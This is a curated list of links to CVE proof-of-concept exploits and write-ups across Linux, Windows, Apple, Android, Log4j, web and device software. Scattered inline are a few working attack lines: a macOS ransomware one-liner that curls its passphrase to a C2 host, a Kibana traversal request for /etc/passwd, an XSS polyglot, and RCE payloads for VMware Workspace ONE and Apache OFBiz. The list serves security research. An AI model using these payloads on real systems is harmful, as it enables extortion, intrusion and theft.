Some CVEs PoCs repos on github or internet.
- First, see: Awesome CVE PoC by qazbnm456.
- To search (without PoCs): cve-search you can use it off-line too.
- This is a nice Wrapper:vFeed.
- Automated Generation of Proofs of Vulnerability with S2E
- SecurityExploits: This repository contains proof-of-concept exploits developed by the Semmle Security Research Team. We always disclose security vulnerabilities responsibly, so this repository only contains exploits for vulnerabilities which have already been fixed and publicly disclosed.
- Penetration_Testing_POC: About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms.
- Como registrar uma CVE
- ALPACA Attack
- Overview: OWASP Top 10 2021
- CVE Trends: So I built CVE Trends; it collates real-time information about tweeted CVEs.
- Spectre : CVE-2017-5753,CVE-2017-5715
- Dirty Cow: CVE-2016-5195 Others
- "Root" via dirtyc0w privilege escalation exploit
- Huge Dirty Cow: CVE-2017-1000405
- SMEP,SMAP and Chrome Sandbox: CVE-2017-5123
- SambaCry: CVE-2017-7494
- The Stack Clash: CVE-2017-1000364
- GoAhead web server: CVE-2017-17562
- New bypass and protection techniques for ASLR on Linux
- Linux ASLR integer overflow: Reducing stack entropy by four: CVE-2015-1593
- Ubuntu CVES: CVE-2017-16995, netfilter, CVE-2013-1763
- Linux Kernel Version 4.14 - 4.4 (Ubuntu && Debian): CVE-2017-16995
- Meltdown/Spectre: Understanding Spectre and Meltdown Vulnerability
- Linux Kernel TCP implementation vulnerable to Denial of Service: CVE-2018-5390
- Linux Kernel Vulnerability Can Lead to Privilege Escalation: Analyzing CVE-2017-1000112. repo: kernel-exploits: A bunch of proof-of-concept exploits for the Linux kernel.
- Malicious Command Execution via bash-completion: CVE-2018-7738
- An integer overflow flaw was found in the Linux kernel's create_elf_tables() function: CVE-2018-14634
- This repo records all the vulnerabilities of linux software I have reproduced in my local workspace
- linux-kernel-exploitation: A bunch of links related to Linux kernel exploitation
- Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration
- System Down: A systemd-journald exploit. Combined Exploitation of CVE-2018-16865 and CVE-2018-16866
- mario_baslr: PoC for breaking hypervisor ASLR using branch target buffer collisions.
- waitid: CVE-2017-5123
- sudo: CVE-2019-14287 - Sudo Bug Allows Restricted Users to Run Commands as Root. redhat, PoC
- Memory corruption in net/packet/af_packet.c: CVE-2020-14386, poc
- BlindSide
- Exploiting a Linux kernel vulnerability in the V4L2 subsystem: CVE-2019-18683
- Heap-Based Buffer Overflow in Sudo: CVE-2021-3156
- Ubuntu OverlayFS Local Privesc: CVE-2021-3493
- A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer: cve-2021-33909-crasher.c cve-2021-33910-crasher.c
- Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug
- Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution: CVE-2021-43267
- PoC for CVE-2021-4034: blasty-vs-pkexec.c
- Linux Kernel Exploit with mqueue: CVE-2022-32250.
- Bringing back the stack attack: CVE-2022-42703 Prefetch Side-Channel Attacks
- Linux kernel stack buffer overflow in nftables: CVE-2023-0179
- Unauthenticated remote DOS in ksmbd NTLMv2 authentication
- Kernel Level Privilege Escalation in Oracle Solaris: CVE-2018-2892
- Office: CVE-2017-0199
- WebDAV: CVE-2017-11882
- WSDL Parser: CVE-2017-8759
- MS .NET: CVE-2017-8759
- WPAD/PAC: aPAColypse now
- Meltdown/Spectre:CVE-2017-5754,CVE-2017-5715
- Packager OLE: CVE-2018-0802
- Integer Overflow: Integer Overflow
- Hardcore corruption of my execve() vulnerability in WSL: CVE-2018-0743
- Privilege Escalation Vulnerability in Windows Standard Collector Service: CVE-2018-0952
- Exploit Published for Windows Task Scheduler Zero-Day. poc
- PowerPool malware exploits ALPC LPE zero-day vulnerability
- You can't contain me! :: Analyzing and Exploiting an Elevation of Privilege Vulnerability in Docker for Windows: CVE-2018-15514
- Invoke-WMILM: This is a PoC script for various methods to acheive authenticated remote code execution via WMI, without (at least directly) using the Win32_Process class. The type of technique is determined by the "Type" parameter.
- Use-after-free (UAF) vulnerability: CVE-2018-8373
- Microsoft Edge RCE: CVE-2018-8495
- Device Guard/CLM bypass using MSFT_ScriptResource: CVE-2018–8212
- A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
- windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
- docx-embeddedhtml-injection: This PowerShell script exploits a known vulnerability in Word 2016 documents with embedded online videos by injecting HTML code into a docx file, replacing the values of all pre-existing embeddedHtml tags.
- Root Cause of the Kernel Privilege Escalation Vulnerabilities: CVE-2019-0808
- DACL Permissions Overwrite Privilege Escalation: CVE-2019-0841
- Scanner PoC for RDP RCE vuln: CVE-2019-0708
- Exploiting the Windows Task Scheduler Through: CVE-2019-1069
- cve-2019-0708-scan
- More Than a Penetration Test: CVE-2019–1082.
- Out-Of-Bounds Read\Write: CVE-2019-1164
- Bluekeep: CVE-2019-0708
- Full exploit chain against Firefox on Windows 64-bit: CVE-2019-11708 & CVE-2019-9810
- CVE-2020-0601: the ChainOfFools/CurveBall attack explained with PoC
- Chainoffools: A PoC for CVE-2020-0601
- CurveBall: PoC for CVE-2020-0601
- Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate
- Glueball, CVE-2020-1464: Interesting tactic by Ratty & Adwind for distribution of JAR appended to signed MSI – CVE-2020-1464, GlueBall: The story of CVE-2020–1464
- Analysis of Recently Fixed IE Zero-Day: CVE-2020-1380
- MIcrosoft-Word-Use-After-Free - Word Docx with exploit.
- Half Life 1 - Buffer overflow In hl.exe's launch -game argument allows an attacker to execute arbitrary code locally or from browser
- PoC for enabling wdigest to bypass credential guard
- Zerologon exploit Test tool for: CVE-2020-1472 paper PoC exploit. Another tools: ze0Dump, SharpZeroLogon - From Lares Labs: Defensive Guidance for ZeroLogon, another exploit, A different way of abusing Zerologon (CVE-2020-1472) ZeroLogon detected by Microsoft Defender for Identity, Invoke-ZeroLogon
- CobaltStrike-BOF: Collection of beacon BOF written to learn windows and cobaltstrike
- Kerberos Bronze Bit Attack – Practical Exploitation: CVE-2020-17049
- Windows SMB Information Disclousure Analysis CVE-2020-17140
- BitLocker Lockscreen bypass: CVE-2020-1398
- Local Privilege Escalation vulnerability found in Dell SupportAssist: CVE-2021-21518 article
- ProxyLogon: CVE-2021-26855 another
- Zero-day vulnerability in Desktop Window Manager: CVE-2021-28310
- Windows kernel zero-day exploi: CVE-2021-1732
- Windows TCP/IP: CVE-2021-24086, PoC another write-up: Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
- Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol, CVE-2020-1113 and CVE-2021-1678. RemotePotato0
- Microsoft Exchange Server Remote Code Execution Vulnerability: CVE-2021-28482 article
- Searching for Deserialization Protection Bypasses in Microsoft Exchange: CVE-2022–21969
- A guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys: CVE-2021-28476
- PrintNightmare:
- C# and Impacket implementation of PrintNightmare: CVE-2021-1675 / CVE-2021-34527.
- Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare): CVE-2021-1675 - PrintNightmare LPE (PowerShell)
- Local Privilege Escalation Edition of: CVE-2021-1675/CVE-2021-34527.
- SpoolSploit: A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.
- current understanding of the #PrintNightmare exploitability flowchart
- Summer of SAM: CVE-2021-36934
- PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well: SpoolSample SpoolerScanner
- Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function.
- Concealed Position: Bring your own print driver privilege escalation tool.
- This Internet Explorer MSHTML remote code execution vulnerability: CVE-2021-40444 CVE-2021-40444 PoC
- ZDI-21-1053: Bypassing Windows Lock Screen
- aad-sso-enum-brute-spray: POC of SecureWorks' recent Azure Active Directory password brute-forcing vuln
- noPOC, but almost: #windows11 Defender bypass (worked for #meterpreter): (build 22000)
- Windows Kernel Information Disclosure POC: CVE-2021-31955
- HTTP Protocol Stack Remote Code Execution Vulnerability: CVE-2021-31166 yara
- Windows User Profile Service 0day LPE: CVE-2021-34484 twit
- Some notes about Microsoft Exchange Deserialization RCE: CVE-2021–42321
- RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
- Pachine: CVE-2021-42278 - Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)
- CallbackHell: Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE). chinese: CVE-2021-40449
- CVE-2021-42287/CVE-2021-42278 Weaponisation Exploit samAccountName spoofing with Kerberos
- noPac: CVE-2021-42287/CVE-2021-42278 - Scanner & Exploiter.
- An unpatched information disclosure in Microsoft Windows CVE-2021-24084
- http.sys CVE-2022-21907
- Group Policy Folder Redirection: CVE-2021-26887
- Unitialized pointer free in RMSRoamingSecurity Remote Code Execution: CVE-2022-21974, other
- Sysmon: CVE-2023-29343
- Proxy-Attackchain: proxylogon & proxyshell & proxyoracle & proxytoken & all exchange server vulns summarization :)
-
Escaping the sandbox by misleading bluetoothd:CVE-2018-4087
-
MS Office 2016 for Mac Privilege Escalation via a Legacy Package: CVE-2018–8412
-
blanket: Mach port replacement vulnerability in launchd on iOS 11.2.6 leading to sandbox escape, privilege escalation, and codesigning bypass (CVE-2018-4280)
-
brokentooth: POC for CVE-2018-4327
-
Kernel RCE caused by buffer overflow in Apple's ICMP packet-handling code: CVE-2018-4407
-
Offensive testing to make Dropbox (and the world) a safer place
-
WebKit-RegEx-Exploit: Safari 12.1.1
-
Chaos iOS: < 12.1.2 PoC by @S0rryMyBad since he posted it as a photo rather than a source code. Also cleaned up.
-
powerd exploit : Sandbox escape to root for Apple iOS < 12.2 on A11 devices
-
iMessage: The Many Possibilities of CVE-2019-8646 poc
-
PoC tool for setting nonce without triggering KPP/KTRR/PAC. (requires tfp0)
-
xnu local privilege escalation via os x 10.10.5 kernel local privilege escalation
-
MacOS Ransomware in one tweet:
sh -c 'p=$(head -n 1024 /dev/urandom | strings| grep -o "[[:alnum:]]" | head -n 64| tr -d "\n"); diskutil apfs addVolume disk1 APFS x -passphrase "$p"; rsync -zvh --remove-source-files ~/exfil/* /Volumes/x; diskutil umount x; curl -0 http://C2/"$p"' -
Don't Share Your $HOME with Untrusted Guests. PoC: This proof-of-concept demonstrates a trivial no-bug, by-design virtual machine guest-to-host escape with full arbitrary code execution on the current version of Parallels Desktop for Mac.
-
WebContent->EL1 LPE: OOBR in AppleCLCD / IOMobileFrameBuffer: CVE-2021-30807
- Please Stop Naming Vulnerabilities: Exploring 6 Previously Unknown Remote Kernel Bugs Affecting Android Phones
- qu1ckr00t: Tailoring CVE-2019-2215 to Achieve Root.
- s8_2019_2215_poc: PoC 2019-2215 exploit for S8/S8 active with DAC + SELinux + Knox/RKP bypass.
- Universal XSS in Android WebView: CVE-2020-6506
- Exploiting a Single Instruction Race Condition in Binder: CVE-2020-0423
- Spring Data Commons: CVE-2018-1273
- Log4Shell Shitshow:
- Log4j 2 Vulnerability Analysis: CVE-2021-44228
- log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228.
- Log4j-RCE-Scanner: Log4j-RCE-Scanner - Remote command execution vulnerability scanner for Log4j.
- CVE-2021-44228-Log4Shell-Hashes
- Apache Log4j RCE Attempts
- CVE-2021-44228-PoC-log4j-bypass-words: CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches.
- Log4shell vulnerabilities: CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, CVE-2021-45105: Operational information regarding the log4shell vulnerabilities in the Log4j logging library.
- Log4j Vulnerability Tester: This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.
- Log4Shell-IOCs: A collection of intelligence about Log4Shell and its exploitation activity.
- Log4Shell MindMaps, repo
- JNDI-Exploit-Kit: A modified version of the great JNDI-Injection-Exploit created by @welk1n. This tool can be used to start an HTTP Server, RMI Server and LDAP Server to exploit java web apps vulnerable to JNDI Injection)
- log4j Linux IoC Detector: A Simple Log4j Indicator of Compromise Linux Detector
- Huntress Log4Shell Testing Application
- nse-log4shell: Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
- OG4J Java exploit - A trick to bypass words blocking patches
- Searchable page for CISA Log4j (CVE-2021-44228) Affected Vendor & Software List link
- How to find 5 RCEs in Apache Struts with Semmle QL: CVE-2018-11776
- Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts: CVE-2018-11776, docker Poc, other poc
- Apache Struts Vulnerability POC Code Found on GitHub
- struts-pwn: An exploit for Apache Struts CVE-2018-11776
- fragattack: This website presents FragAttacks (fragmentation and aggregation attacks) which is a collection of new security vulnerabilities that affect Wi-Fi devices.
- Spectre: CVE-2017-5753,CVE-2017-5715
- Meltdown: CVE-2017-5754
- Cyberus: Meltdown
- L1 Terminal Fault: CVE-2018-3615/CVE-2018-3620/CVE-2018-3646/INTEL-SA-00161
- TPM—Fail: TPM meets Timing and Lattice Attacks. TPM-FAIL vulnerabilities impact TPM chips in desktops, laptops, servers, github.
- Hundreds Of Millions Of Dell Computers At Risk Due to Multiple BIOS Driver Privilege Escalation Flaws: CVE-2021-21551
- Reverse Engineering & Exploiting Dell CVE-2021-21551
- Know Your Enemy: Exploiting the Dell BIOS Driver Vulnerability to Defend Against It: CVE-2021-21551
- ARM exploitation for IoT – Episode 3
- Multiple vulnerabilities found in Wireless IP Camera: CVE-2017-8224, CVE-2017-8222, CVE-2017-8225, CVE-2017-8223, CVE-2017-8221
- DoubleDoor, IoT Botnet bypasses firewall as well as modem security using two backdoor exploits: CVE-2015–7755 and CVE-2016–10401
- i.MX7 M4 Atomic Cache Bug
- MikroTik Firewall & NAT Bypass
- Security probe of Qualcomm MSM data services CVE-2020-11292 news
- HPE iLO4: CVE-2017-12542
- From Compiler Optimization to Code Execution - VirtualBox VM Escape: CVE-2018-2844. poc
- VirtualBox 3D PoCs & exploits
- Multiple Vulnerabilities on Kerui Endoscope Camera
- virtualbox_e1000_0day: VirtualBox E1000 Guest-to-Host Escape
- PHPMailer: CVE-2016-10033
- PHP PrestaShop 1.6.x Privilege Escalation: CVE-2018-13784
- phpLdapAdmin multiple vulns: phpldapadmin remote exploit and vulnerable container.
- imagecolormatch() OOB Heap Write exploit: CVE-2019-6977
- vBulletin: 2019_vbulletin_0day_info.txt
- PHP 7.0-7.4 disable_functions bypass
- XML-RPC-Library-1.3.0-Remote-PHP-Code-Execution-Exploit
- xmlrpc-bruteforcer: Multi-threaded XMLRPC brute forcer using amplification attacks targeting WordPress installations prior to version 4.4.
- CutePHP Cute News 2.1.2 RCE PoC: CVE-2019-11447
- Tenable a lot of Proof of Concepts
- misc PoC - Internet of (In)Security Things:
- Dahua Console, access internal debug console and/or other researched functions in Dahua devices. Feel free to contribute in this project.
- Geovision Inc. IP Camera, with a lot others in this repo
- Disclosures by DrunkenShells
- Apache Tomcat: CVE-2017-12617
- Palo Alto Networks firewalls: Palo Alto Networks firewalls remote root code execution CVE-2017-15944
- https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/ and A fully implemented kernel exploit for the PS4 on 4.05FW
- HOW TO HACK A TURNED-OFF COMPUTER, OR RUNNING UNSIGNED CODE IN INTEL ME (CVE-2017-5705, CVE-2017-5706, CVE-2017-5707), github
- Nintendo Switch JailBreak PoC:CVE-2016-4657
- Play with FILE Structure - Yet Another Binary Exploit Technique
- Zero-day vulnerability in Telegram
- A Telegram bug that disclose phone numbers of any users in public groups
- Bug or Backdoor: Exploiting a Remote Code Execution in ISPConfig by 0x09AL Security blog.
- SSH Exploit written in Python for CVE-2018-15473 with threading and export formats: CVE-2018-15473, analysis
- RICOH MP 2001 Printer Cross Site Scripting ≈ Packet Storm, code, Cross-Site Scripting
- Oracle WebLogic WLS-WSAT Remote Code Execution Exploit: CVE-2017-10271
- Oracle BI, Out of Band XXE Injection Via gopher: CVE-2016-3473
- WebLogic Exploit: CVE-2017-10271
- Weblogic RCE by only one GET request — CVE-2020–14882 Analysis
- Talos Vulnerability Deep Dive: Sophos HitmanPro.Alert vulnerability - CVE-2018-3971
- JPEG [JAY-peg], some pocs JPEG PoCs
- Kubernets: CVE-2018-1002105
- QEMU: vga: OOB read access during display update: CVE-2017-13672,
- QEMU VM Escape: CVE-2019-14378
- Exploiting LaTeX with CVE-2018-17407
- GitHub Desktop RCE (OSX)H1-702 2018, poc
- unprivileged users with UID > INT_MAX can successfully execute any systemctl command (#74)
- GitLab CE/EE affecting all versions starting from 11.9.: CVE-2021-22205
- Authenticated RCE in Polycom Trio 8800, pt.1
- Tenable Research Advisory: Zoom Unauthorized Command Execution - CVE-2018-15715
- Crash Chrome 70 with the SQLite Magellan bug code
- From vulnerability report to a crafted packet using instrumentation: CVE-2018-4013
- PoC for Foxit Reader: CVE-2018-14442
- Social Network Tabs Wordpress Plugin Vulnerability: CVE-2018-20555
- 700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin
- ES File Explorer Open Port Vulnerability: CVE-2019-6447
- Atlassian Jira vulnerable: CVE-2017-9506
- Chrome:
- CVE-2019-5782
- CVE-2019-5786: FileReader Exploit
- CVE-2019-13054: The page utilizes the new WebHID API to extract AES encryption keys from vulnerable dongles. PoC Page
- chrome 0day r4j0x00
- ELECTRIC CHROME: CVE-2020-6418 on Tesla Model 3.
- Analysis of Chromium issue 1196683, 1195777
- Google Books X-Hacking
- Ruby on Rails: File Content Disclosure on Rails - CVE-2019-5418
- Libreoffice - Remote Code Execution via Macro/Event execution: CVE-2018-16858
- Signal IDN homograph attack: CVE-2019-9970.
- Grandstream Exploits: Grandstream Exploits
- Apache HTTPD Root Privilege Escalation - CARPE (DIEM): CVE-2019-0211, github
- Apache <= 2.4.48 - Mod_Proxy SSRF: CVE-2021-40438
- Say Cheese: Ransomware-ing a DSLR Camera -
echo H4sICH0mqFkAA3BvYwDbweS/W8LxrMCuK8wbZN85bWh494VhFIwUELoKAIJvFIwAAgAA | base64 -d | gunzip > a && qemu-system-i386 -vga cirrus a- Elasticsearch Kibana Console CVE-2018-17246 PoC:
GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd- Web/Javscript/WAF Payload will run in a lot of contexts: Short but lethal. No script tags, thus bypassing a lot of WAF and executes in multiple environments.
javascript:"/*'/*`/*--><html \" onmouseover=/*<svg/*/onload=alert()//>- Thrangrycat
- Responding to Firefox 0-days in the wild
- Bitbucket 6.1.1 Path Traversal to RCE: CVE-2019-3397
- ThinVNC Client Authentication Bypass: CVE-2019-17662 - with PoC
- metasploit http DoS module: CVE-2019-5645
- PandoraFMS v7.0NG authenticated Remote Code Execution: CVE-2019-20224
- First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group
- Mikrotik Winbox: CVE-2018-14847 metasploit 45578
- MkCheck: Script to check MikroTik Routers the WinBox Authentication Bypass Disclosure & RouterOS Jailbreak vulnerabilities
- Jenkins Security Advisory 2020-08-17/CVE-2019-17638: Operation on a Resource after Expiration or Release in Jetty Server on hacker news
- Some PoCs about: CVE-2020-8207 and CVE-2020-8324.
- Richsploit: One tool to exploit all versions of RichFaces ever released CVE-2018-14667
- Forget Your Perimeter - RCE in Pulse Connect Secure: CVE-2020-8218.
- Pulse Connect Secure Samba buffer overflow: cve- 2021-22908
- some Starlabs CVES:
- The Route to Root: Container Escape Using Kernel Exploitation
- cve-scanner-exploiting-pocs: Collection of ideas and specific exploits against Docker CVE scanners
- Docker Escape Tool: Tool to test if you're in a Docker container and attempt simple breakouts
- AT-TFTP_Long_Filename: Exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.
- The Anatomy of a Bug Door: Dissecting Two D-Link Router Authentication Bypasses, CVEs CVE-2020-8863 and CVE-2020-8864. dsp-w215-hnap: Tool for reading data from D-Link DSP-W215 Smart Plug
- An Exercise in Practical Container Escapology
- VMware vCenter 6.5u1
- The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server: CVE-2021-21985
- VMware vCenter Server: CVE-2021-21985
- Exploit for VMware Workspace ONE Access: CVE-2022-22954
curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}' - VMWare vRealize Network Insight Pre-Authenticated RCE: CVE-2023-20887
- Unauthenticated Full-Read SSRF in Grafana: CVE-2020-13379
- Cisco Security Manager PoCs
- UK NCSC’s alert urges orgs to fix MobileIron: CVE-2020-15505
- CSM_Pocs: Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. CSM_pocs.
- Fortiscan (CVE-2018-13379): A high performance FortiGate SSL-VPN vulnerability scanning and exploitation tool.
- FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests: CVE-2018-13379: This module massively scan and exploit a path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests (CVE-2018-13379).
- FortiWeb CVE
- Use-After-Free IE Vulnerability: CVE-2020-17053
- Cisco ASA: CVE-2020-3452
- github cli: CVE-2020-26233
- ECOSPLOITS: Bunch of exploits for eCOS.
- Advisory X41-2021-002: nginx DNS Resolver Off-by-One Heap Write Vulnerability: CVE-2021-23017
- F5 BIG-IQ: CVE-2021-22986
- Pulse Connect Secure: CVE-2021-22937
- Dahua cameras: CVE-2021-33044 and CVE-2021-33045
- Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code Exploit “CONTENT-TYPE CONFUSION” – UNSAFE CODE EXECUTION
- Zoom RCE from Pwn2Own 2021
- GHSL-2021-102: ReDoS (Regular Expression Denial of Service) in Fluentd - CVE-2021-41186
- WSO2 RCE exploit and writeup: CVE-2022-29464
- Barracuda Email Security Gateway Appliance (ESG) Vulnerability
- SonicWall Discovers Critical Apache OFBiz Zero-day -AuthBiz CVE-2023-51467 poc poc code:
/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y
Please, send pull requests for new additions.
Thanks!